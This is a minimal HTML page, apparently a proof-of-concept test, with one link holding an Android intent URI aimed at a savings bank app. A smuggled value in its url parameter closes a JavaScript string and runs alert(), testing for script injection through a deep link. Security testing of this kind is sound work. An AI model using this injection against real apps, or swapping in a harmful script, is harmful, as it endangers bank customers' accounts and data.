<html>
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta http-equiv="cache-control" content="max-age=0" />
        <meta http-equiv="cache-control" content="no-store" />
        <meta http-equiv="expires" content="-1" />
        <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
        <meta http-equiv="pragma" content="no-cache" />
        <meta name="msapplication-TileColor" content="#FFFFFF">
    </head>
<body>
    <a href="intent://com.cabsoft.oksavingbank/?url=ok_main.loan');alert();//test#Intent;scheme=oksavingbank;action=android.intent.action.VIEW;end
    ">link</a>
</body>
</html>